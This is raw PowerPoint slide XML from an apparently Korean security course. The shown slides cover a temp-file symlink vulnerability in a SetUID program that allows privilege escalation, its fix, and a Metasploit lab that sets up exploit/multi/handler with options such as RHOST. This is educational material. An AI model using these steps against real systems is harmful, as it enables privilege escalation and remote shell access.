                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>fopen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연다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링크이므로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ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>소유의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62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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>의해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입력한 내용</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추가된다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6" name="화살표: 오른쪽 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16EF7B63-D41B-41A6-BA16-FE86C4B459F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5905500" y="3764280"/>
            <a:ext cx="381417" cy="220980"/>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5855759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4905" y="368998"/>
            <a:ext cx="5616792" cy="53231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_x1658365728">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BC1404B-71FF-41DC-B4B6-05D455009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13" y="943068"/>
            <a:ext cx="4622147" cy="3323713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="_x1659855720">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7205F5AD-930B-4C48-A1F2-2B29EB99D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804" y="798418"/>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표 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE27505-0E1B-4441-8F86-6B6670D21030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64389986"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286917" y="531781"/>
          <a:ext cx="5412768" cy="506898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⑤ 파일 닫기 이후 소프트 링크 생성 시도</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        <a:ea typeface="+mn-ea"/>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626110" marR="0" indent="-626110" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFontTx/>
                        <a:buChar char="-"/>
                      </a:pP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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="표 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E31B4F6-AB67-476A-AAE5-CDE1906087FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1172261686"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="494134" y="572958"/>
          <a:ext cx="5412768" cy="5801071"/>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③ 파일 생성 및 내용 쓰기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48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fopen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생성된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소유로 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④ 파일 쓰기 및 파일 닫기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10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8290BCC-9756-4035-B1DE-175E2F95E67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5763544"/>
            <a:ext cx="5616792" cy="72545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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11062957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55CF3B43-3E41-4D83-921D-577C88622BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2514220840"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3072320" y="2456501"/>
          <a:ext cx="6047359" cy="2899156"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="800735">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3283276046"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5246624">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4194568348"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="85788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교과목</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소개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암호 및 인증의 일반 이론 습득 및 응용 분야에 대한</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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주요 정보보호 기술의 이해</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499094"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="58356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교육목표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군 정보체계에 적용 중인 정보보호 기술을 이해할 수 있는 실력 함양</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8879915"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1457706">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주교재 및</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참고교재</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주교재</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강의안</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참고교재 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>필수는 아님</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</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정보보호총론</a:t>
                      </a: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장상수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"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생능출판</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="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150549"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6105905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7D80079-A11C-43EE-9972-D3F4784D0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시스템은 임시 파일을 간편하게 생성하기 위해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하지만 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대해 취약점을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해소하시오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 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C368EF7A-92D1-4A91-81D9-5D26FFC48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B6DCF83-117F-4AE4-9EA9-30C83997164A}"/>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   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5CC42FDF-5869-4AED-8491-8D923280D19D}"/>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920B5FD6-6171-46A1-B1F9-896664A6F0F8}"/>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C070845F-0B2E-4ECF-9421-4008703FCE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7763094-5A83-47D7-820A-3B67422636A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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29802422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–l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/createTempFile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createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>vi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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 후 다시 파일을 추가하는 취약점으로 권한 상승에 이용될 수 있음</a:t>
            </a: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취약한 부분 수정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>fopen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>옵션 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(“a” → “w”)</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91166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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) createTempFile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createTempFile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SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>부여</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dirty="0" err="1"/>
              <a:t>u+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> createTempFile</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 155">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C86DE2-5CFF-4922-B74D-3E79D49FC314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479425" y="1100666"/>
            <a:ext cx="5135880" cy="541020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 157">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AE325C-E7D5-42AF-837C-9CF57E2E09E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1582" t="895" r="753" b="540"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479425" y="2190750"/>
            <a:ext cx="4705350" cy="2565400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 159">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1EB702-DA42-4AD4-A5CE-03B8D959BB39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1365" t="-19" r="821" b="460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="466726"/>
            <a:ext cx="4891087" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 161">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A719016-8296-4BCE-A732-C7DB8945926F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="1614" t="13375" r="936" b="78042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="3671888"/>
            <a:ext cx="4891087" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 163">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7AC04FE-A749-43E7-A9DD-F9FF82E99ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="1765" t="13945" r="1303" b="65179"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="4491036"/>
            <a:ext cx="4826191" cy="666751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D94F8C23-D2DC-409F-BC4C-A9AA10E30E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5378388"/>
            <a:ext cx="5616792" cy="111061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318372023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msfconsole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구동하시오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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194428230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서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ifconfig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Metasploit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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>use exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt; use exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/handler</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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>show options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&gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 167">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E295136F-BC83-41C3-8CA1-CCEBAC773E26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568960" y="1062566"/>
            <a:ext cx="4922647" cy="2972181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 169">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA368846-64C5-4769-92E1-E1A20DD21B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="645161" y="4560146"/>
            <a:ext cx="1474084" cy="736869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 171">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99680F7B-188C-480E-B4BA-66C2B9E08F1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2260539" y="4352903"/>
            <a:ext cx="3512349" cy="1868328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 173">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD3A009-4181-4981-8B27-BC0B311D94D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="50" t="87424" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="944880"/>
            <a:ext cx="4992624" cy="351366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 175">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE44FFD-315F-4697-AF6C-1E6DF9EB9E13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="53" t="88153" r="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321334" y="1993011"/>
            <a:ext cx="4992624" cy="351366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 177">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974ED12D-E9DE-45FC-AE82-FACB25C0D690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324382" y="3041142"/>
            <a:ext cx="4989576" cy="298437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27040050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RHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
